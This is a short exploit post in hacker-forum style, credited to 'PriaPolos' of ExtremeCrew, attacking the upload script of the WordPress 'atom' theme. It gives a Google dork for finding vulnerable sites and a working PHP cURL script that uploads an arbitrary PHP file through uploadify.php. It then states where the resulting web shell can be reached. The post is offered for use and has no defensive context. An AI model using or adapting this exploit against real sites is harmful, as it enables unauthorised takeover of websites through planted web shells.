Assalamuallaikum Wr.Wb
- PriaPolos Here !!!
Cekidot :
- Dork : inurl:"/wp-content/themes/atom/"
- Exploit: /wp-content/themes/atom/uploadify/uploadify.php
<?php
$uploadfile="
PriaPolos.php";
$ch = curl_init("
http://127.0.0.1/path/wp-content/themes/atom/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Location Shell :
/wp-content/themes/atom/uploadify/uploads/randomnumber.php
Credits :
Faizal Affandy aKa PriaPolos Ft Mr.BucketHead | ExtremeCrew -